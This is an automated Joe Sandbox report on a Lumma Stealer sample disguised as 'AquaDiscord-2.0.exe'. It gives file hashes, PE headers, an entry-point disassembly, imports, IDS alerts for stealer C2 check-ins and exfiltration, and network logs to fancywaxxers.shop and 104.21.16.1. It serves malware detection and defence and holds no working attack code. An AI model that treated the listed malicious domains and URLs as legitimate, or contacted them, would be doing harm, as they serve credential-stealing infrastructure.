                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94AquaDiscord-2.0.exe, 00000002.00000003.1723179894.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://fancywaxxers.shop:443/apiRAquaDiscord-2.0.exe, 00000002.00000003.1737584566.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000002.2909842558.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1791621621.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1692630755.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401885385.0000000002DD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgAquaDiscord-2.0.exe, 00000002.00000003.1723179894.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoAquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaAquaDiscord-2.0.exe, 00000002.00000003.1723179894.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://ocsp.rootca1.amazontrust.com0:AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016AquaDiscord-2.0.exe, 00000002.00000003.1709004731.0000000005449000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1694093363.0000000005450000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1709186168.0000000005449000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1694160465.0000000005449000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.ecosia.org/newtab/AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brAquaDiscord-2.0.exe, 00000002.00000003.1722843066.000000000551A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ac.ecosia.org/autocomplete?q=AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://fancywaxxers.shop/LAquaDiscord-2.0.exe, 00000002.00000003.1737668890.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1737933383.0000000002E63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgAquaDiscord-2.0.exe, 00000002.00000003.1723179894.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://support.microsofAquaDiscord-2.0.exe, 00000002.00000003.1694093363.0000000005450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?AquaDiscord-2.0.exe, 00000002.00000003.1721976712.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://fancywaxxers.shop/api~JAquaDiscord-2.0.exe, 00000002.00000003.1692630755.0000000002DED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesAquaDiscord-2.0.exe, 00000002.00000003.1694160465.0000000005424000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://fancywaxxers.shop:443/api?AquaDiscord-2.0.exe, 00000002.00000003.1692630755.0000000002DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://fancywaxxers.shop/AquaDiscord-2.0.exe, 00000002.00000003.1692630755.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000002.2910034398.0000000002E5F000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1737979972.0000000002DED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://fancywaxxers.shop:443/api7AquaDiscord-2.0.exe, 00000002.00000002.2909842558.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401885385.0000000002DD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.21.16.1
                                                                                        fancywaxxers.shopUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1582529
                                                                                        Start date and time:2024-12-30 20:39:08 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 5m 10s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:7
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:AquaDiscord-2.0.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@4/0@1/1
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 98%
                                                                                        • Number of executed functions: 51
                                                                                        • Number of non-executed functions: 115
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.253.45
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: AquaDiscord-2.0.exe
                                                                                        TimeTypeDescription
                                                                                        14:40:00API Interceptor8x Sleep call for process: AquaDiscord-2.0.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        104.21.16.1JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        fancywaxxers.shoprandom.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.48.1
                                                                                        UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.32.1
                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.1
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSweb44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.154.95
                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.208.58
                                                                                        SharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                        • 104.21.64.143
                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.96.3
                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.0.151
                                                                                        https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                        • 104.17.25.14
                                                                                        random.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.64.143
                                                                                        https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                        • 1.1.1.1
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                        • 104.21.16.1
                                                                                        web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.16.1
                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.16.1
                                                                                        SharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                        • 104.21.16.1
                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.16.1
                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.16.1
                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.16.1
                                                                                        random.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.16.1
                                                                                        UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.16.1
                                                                                        PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.16.1
                                                                                        No context
                                                                                        No created / dropped files found
                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.827269120715067
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:AquaDiscord-2.0.exe
                                                                                        File size:834'048 bytes
                                                                                        MD5:a15ebbc7798933dc1d436b59600f3aca
                                                                                        SHA1:c666f3ea96290df82eba8452262fa9c84ad8b518
                                                                                        SHA256:875390ef2cf52c86926147fed0ef8db6ddc8ad8422ecf5760462f2e03fc61bd3
                                                                                        SHA512:22ceec3e5deccbd3d78cf329c94b42e96647a6ddfbfecb96e57693daac106f209edec3836676d72b0a3a272d9f74ef3a33062d2e28e2bec52821142e0e6ef8cc
                                                                                        SSDEEP:24576:Y4dPpQPmY1dzvMoyZljwur1dzvMoyZljwu+:hdPp/M5vMb3wuB5vMb3wu+
                                                                                        TLSH:210512517582C0B3CC631AB759FDA3B6562EF9600B21A9DF47D40FBE6F621C05630B2A
                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....rg.................H........................@.......................................@.....................................(..
                                                                                        Icon Hash:90cececece8e8eb0
                                                                                        Entrypoint:0x40a2a0
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows cui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6772AADA [Mon Dec 30 14:14:50 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:d6bfc0ff235c28cc21f6045af30834e6
                                                                                        Instruction
                                                                                        call 00007F1EFC808A4Ah
                                                                                        jmp 00007F1EFC8088ADh
                                                                                        mov ecx, dword ptr [004307C0h]
                                                                                        push esi
                                                                                        push edi
                                                                                        mov edi, BB40E64Eh
                                                                                        mov esi, FFFF0000h
                                                                                        cmp ecx, edi
                                                                                        je 00007F1EFC808A46h
                                                                                        test esi, ecx
                                                                                        jne 00007F1EFC808A68h
                                                                                        call 00007F1EFC808A71h
                                                                                        mov ecx, eax
                                                                                        cmp ecx, edi
                                                                                        jne 00007F1EFC808A49h
                                                                                        mov ecx, BB40E64Fh
                                                                                        jmp 00007F1EFC808A50h
                                                                                        test esi, ecx
                                                                                        jne 00007F1EFC808A4Ch
                                                                                        or eax, 00004711h
                                                                                        shl eax, 10h
                                                                                        or ecx, eax
                                                                                        mov dword ptr [004307C0h], ecx
                                                                                        not ecx
                                                                                        pop edi
                                                                                        mov dword ptr [00430800h], ecx
                                                                                        pop esi
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        sub esp, 14h
                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                        xorps xmm0, xmm0
                                                                                        push eax
                                                                                        movlpd qword ptr [ebp-0Ch], xmm0
                                                                                        call dword ptr [0042E8C8h]
                                                                                        mov eax, dword ptr [ebp-08h]
                                                                                        xor eax, dword ptr [ebp-0Ch]
                                                                                        mov dword ptr [ebp-04h], eax
                                                                                        call dword ptr [0042E884h]
                                                                                        xor dword ptr [ebp-04h], eax
                                                                                        call dword ptr [0042E880h]
                                                                                        xor dword ptr [ebp-04h], eax
                                                                                        lea eax, dword ptr [ebp-14h]
                                                                                        push eax
                                                                                        call dword ptr [0042E910h]
                                                                                        mov eax, dword ptr [ebp-10h]
                                                                                        lea ecx, dword ptr [ebp-04h]
                                                                                        xor eax, dword ptr [ebp-14h]
                                                                                        xor eax, dword ptr [ebp-04h]
                                                                                        xor eax, ecx
                                                                                        leave
                                                                                        ret
                                                                                        mov eax, 00004000h
                                                                                        ret
                                                                                        push 00431AB8h
                                                                                        call dword ptr [0042E8E8h]
                                                                                        ret
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        mov al, 01h
                                                                                        ret
                                                                                        push 00030000h
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2e6ac0x28.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000xe8.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x1b80.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x2a9a80x18.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26e400xc0.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2e8200x14c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x2479a0x24800e99bb4e274380b09613559d3b1a664fbFalse0.554781142979452data6.559742159760055IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x260000x9eb40xa0003f1d7f6413abea491661acb746eefebfFalse0.428271484375DOS executable (COM)4.91372050063646IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x300000x22800x1600112d0c9e43893ae5b7f96d23807996acFalse0.39506392045454547data4.581141173428789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .tls0x330000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x340000xe80x20003d6bf5d1e31277fc8fb90374111d794False0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x350000x1b800x1c006e4c901089600f702531dbe2643a65b6False0.7770647321428571data6.526735403310053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        .BSS0x370000x4ca000x4ca009ee832d4aed74c7097c0a4b519fd8b77False1.000337734502447data7.999350903774988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .BSS0x840000x4ca000x4ca009ee832d4aed74c7097c0a4b519fd8b77False1.000337734502447data7.999350903774988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_MANIFEST0x340600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                        DLLImport
                                                                                        KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-30T20:40:00.758376+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.16.1443TCP
                                                                                        2024-12-30T20:40:01.241350+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.16.1443TCP
                                                                                        2024-12-30T20:40:01.241350+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.16.1443TCP
                                                                                        2024-12-30T20:40:01.729539+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.16.1443TCP
                                                                                        2024-12-30T20:40:02.279785+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.16.1443TCP
                                                                                        2024-12-30T20:40:02.279785+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.16.1443TCP
                                                                                        2024-12-30T20:40:03.423030+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.16.1443TCP
                                                                                        2024-12-30T20:40:04.622792+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.16.1443TCP
                                                                                        2024-12-30T20:40:05.223121+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449733104.21.16.1443TCP
                                                                                        2024-12-30T20:40:05.886609+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.16.1443TCP
                                                                                        2024-12-30T20:40:07.393149+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.16.1443TCP
                                                                                        2024-12-30T20:40:08.760534+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.16.1443TCP
                                                                                        2024-12-30T20:40:12.789707+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.16.1443TCP
                                                                                        2024-12-30T20:40:13.250576+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737104.21.16.1443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 30, 2024 20:40:00.277244091 CET49730443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:00.277275085 CET44349730104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:00.277339935 CET49730443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:00.280221939 CET49730443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:00.280234098 CET44349730104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:00.758264065 CET44349730104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:00.758375883 CET49730443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:00.761853933 CET49730443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:00.761862993 CET44349730104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:00.762269020 CET44349730104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:00.810790062 CET49730443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:00.810820103 CET49730443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:00.810897112 CET44349730104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:01.241374016 CET44349730104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:01.241511106 CET44349730104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:01.241560936 CET49730443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:01.247203112 CET49730443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:01.247215033 CET44349730104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:01.247240067 CET49730443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:01.247245073 CET44349730104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:01.270971060 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:01.271011114 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:01.271111965 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:01.271473885 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:01.271486998 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:01.729444981 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:01.729538918 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:01.835076094 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:01.835124016 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:01.835504055 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:01.845944881 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:01.845988035 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:01.846024990 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.279783964 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.279849052 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.279889107 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.279925108 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.279944897 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.280006886 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.280041933 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.280056000 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.280106068 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.280138969 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.280145884 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.280193090 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.280211926 CET49731443192.168.2.4104.21.16.1
